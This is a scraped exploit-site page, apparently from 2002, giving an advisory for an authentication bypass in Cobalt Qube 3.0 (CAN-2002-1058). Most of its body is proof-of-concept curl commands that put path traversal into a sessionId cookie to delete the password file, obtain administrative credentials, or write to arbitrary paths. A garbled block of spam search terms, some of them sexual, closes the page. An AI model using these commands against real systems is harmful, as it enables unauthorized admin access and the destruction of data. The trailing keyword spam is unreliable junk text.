about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Cobalt Qube Authentication Bypass Vulnerability


Title Cobalt Qube Authentication Bypass Vulnerability
Published 2002-07-24-12:00AM
Updated 2002-07-24-06:32PM
Class Input Validation Error
CVE   CAN-2002-1058
Remote  Yes
Local  No
Credit  Discovery credited to pokley <saleh@scan-associates.net>.
Vulnerable  Cobalt Qube 3.0
Not Vulnerable  
Code   The following proof of concepts were provided by pokley <saleh@scan-associates.net>:
$curl -b sessionId=../../../../../../../../etc/passwd;loginName=root:x:0:0:root:/root:/bin/bash
http://192.168.0.1:444/splashAdmin.php

This will allow the attacker to delete the password file.

The following will enable the attacker to obtain administrative credentials on the vulnerable system.
$curl -b sessionId=../codb/objects/4/.name;loginName=admin
http://192.168.0.1:444/splashAdmin.php

$ curl -b sessionId=/../../../../../../tmp/test;loginName=admin
http://192.168.0.1:444/splashAdmin.php
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 20:49:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
shylastyle Aishswarya videos de IRIX fam s www sexs c saxy woman www.zjduod to check s www sex.co ongc sciphar.co xpl/exploi whpiano.ne sexy.vidoe Ravi 112 WWW.WORLDS Tamilactre six girls port 1434 evotopsite 8u9com indiansexp /search/ex banisadr SSH Brute /search/ex M...u.de/. c...252F/h TIT www.tamilm saexy .c yonja Adik kaka exploits f WWW.eptrib indian mas chennaionl Open.Girls php-nuke 2 chennaionl cve-2003-0 news for c chat regis t154t chennaionl jpg Inject Aba www.pinUpG chennaionl